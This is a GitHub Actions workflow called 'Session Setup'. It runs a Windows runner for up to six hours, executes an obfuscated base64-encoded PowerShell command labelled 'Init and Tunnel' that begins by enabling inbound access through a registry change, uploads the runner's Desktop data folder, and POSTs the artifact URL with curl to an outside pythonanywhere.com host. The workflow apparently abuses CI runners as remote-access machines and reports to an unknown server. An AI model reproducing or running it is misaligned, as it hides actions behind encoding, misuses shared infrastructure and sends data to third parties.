name: Session Setup

on:
  workflow_dispatch:

jobs:
  job-alpha:
    runs-on: windows-2022
    timeout-minutes: 360

    steps:
      # Step 1: Checkout repository to access BAT script
      - name: Checkout repository
        uses: actions/checkout@v3

      # Step 2: Download, move, and unzip artifact
      - name: Download, move, and unzip artifact
        shell: cmd
        run: .\download_move_unzip.bat

      # Step 3: Init and Tunnel
      - name: Init and Tunnel
        shell: pwsh
        run: |
          powershell -EncodedCommand "IwAgAEUAbgBhAGIAbABlACAAaQBuAGIAbwB1AG4AZAAgAGEAYwBjAGUAcwBzAAoAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEwATQA6AFwAUwBvAGYAdAB3AGEAcgB..."

      # Step 4: List Desktop Data contents for debugging
      - name: List Desktop Data contents
        shell: cmd
        run: dir "%USERPROFILE%\Desktop\data"
        continue-on-error: true

      # Step 5: Upload Desktop Data as artifact
      - name: Upload Desktop Data as "data" artifact
        uses: actions/upload-artifact@v4
        with:
          name: data
          path: "%USERPROFILE%\Desktop\data"
        if: always()

      # Step 6: Send artifact download URL to external server
      - name: Send artifact download URL to external server
        env:
          GITHUB_RUN_ID: ${{ github.run_id }}
          ARTIFACT_URL: https://github.com/${{ github.repository }}/actions/runs/${{ github.run_id }}/artifacts
        shell: bash
        run: |
          url="${ARTIFACT_URL}"
          json="{\"url\": \"$url\"}"
          echo "Sending artifact URL $url to external server via curl"
          curl -X POST "https://azcaptchahh.pythonanywhere.com/url" -H "Content-Type: application/json" -d "$json"
